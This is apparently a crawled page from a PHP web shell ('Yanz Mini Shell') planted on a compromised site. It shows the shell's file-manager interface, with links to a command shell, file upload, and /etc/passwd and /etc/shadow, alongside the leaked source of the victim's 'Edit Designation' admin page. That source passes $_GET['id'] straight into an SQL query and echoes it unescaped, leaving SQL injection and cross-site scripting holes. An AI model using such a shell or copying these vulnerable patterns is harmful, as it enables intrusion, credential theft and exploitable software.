Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
housgcjs
elaan.net
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php $path="admin/orna/"; require_once('admin/orna/db.php'); $sql_desg="select * from `".$MySQL_database."`.pay_desg where id='".$_GET['id']."'"; $desg=mysqli_fetch_assoc(mysqli_query($connection,$sql_desg)); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <meta name="keyword" content=""> <title>Edit Designation</title> <script src="assets/js/now.js"></script> <!-- Bootstrap core CSS --> <link href="assets/css/bootstrap.css" rel="stylesheet"> <link href="assets/css/orna.css" rel="stylesheet"> <!--external css--> <link href="assets/font-awesome/css/font-awesome.css" rel="stylesheet" /> <link rel="stylesheet" type="text/css" href="assets/js/gritter/css/jquery.gritter.css" /> <!-- Custom styles for this template --> <link href="assets/css/style.css" rel="stylesheet"> <link href="assets/css/style-responsive.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script> <![endif]--> <style> input, select, textarea, .select2-container--default .select2-selection--single{ text-transform:none !important; } </style> </head> <body> <section id="container" > <!--header start--> <?php require_once('inc-core/header.inc')?> <!--header end--> <!--sidebar start--> <?php require_once('inc-core/side-bar.inc');?> <!--sidebar end--> <!--main content start--> <section id="main-content"> <section class="wrapper site-min-height"> <table class="table table-striped table-advance table-hover"> <thead> <tr> <th class="col-md-12"> <a href="#"><button class="btn btn-theme btn-xs" id="up"><i class="fa fa-save"></i> Save Changes</button></a> <a href="pay_desig_list.php"><button class="btn btn-primary btn-xs"><i class="fa fa-list"></i> Designations List</button></a> </th> <th class="col-md-10"></th> </tr> </thead> </table> <!--content-start--> <div id="title"> <div class="row"> <div class="col-sm-12"> <h1>Edit Designation</h1> <p>Please fill all the required fields!</p> </div> </div> </div> <div id="form-wrapper"> <form class="form-inline" id="form" role="form" action="" method="POST"> <div class="row"> <div class="col-sm-12"> Designation Title: <input type="text" class="form-control" placeholder="Designation Title" name="title" required value="<?php echo $desg["title"]?>"> </div> <div class="col-sm-12"> Description: <input type="text" class="form-control" placeholder="Designation Description" name="descp" required value="<?php echo $desg["descp"]?>"> <input type="hidden" id='table' value="pay_desg"> <input type="hidden" id='id' value="<?php echo $_GET['id'];?>"> <input type="hidden" name="user" value="<?php echo $_SESSION['myusername'];?>"> </div> </div> </form> </div> <!--content-end--> </section><!--/wrapper --> </section><!-- /MAIN CONTENT --> <!--main content end--> <?php require_once('inc-core/footer.inc')?> </section> <!-- js placed at the end of the document so the pages load faster --> <script src="assets/js/jquery.js"></script> <script src="assets/js/bootstrap.min.js"></script> <script src="assets/js/jquery-ui-1.9.2.custom.min.js"></script> <script src="assets/js/jquery.ui.touch-punch.min.js"></script> <script class="include" type="text/javascript" src="assets/js/jquery.dcjqaccordion.2.7.js"></script> <script src="assets/js/jquery.scrollTo.min.js"></script> <script src="assets/js/jquery.nicescroll.js" type="text/javascript"></script> <!--script for this page--> <script type="text/javascript" src="assets/js/gritter/js/jquery.gritter.js"></script> <script src="admin/ajax/js/edit.js" type="text/javascript"></script> <!--common script for all pages--> <script src="assets/js/common-scripts.js"></script> </body> </html>
Free Space : 77943406592 Byte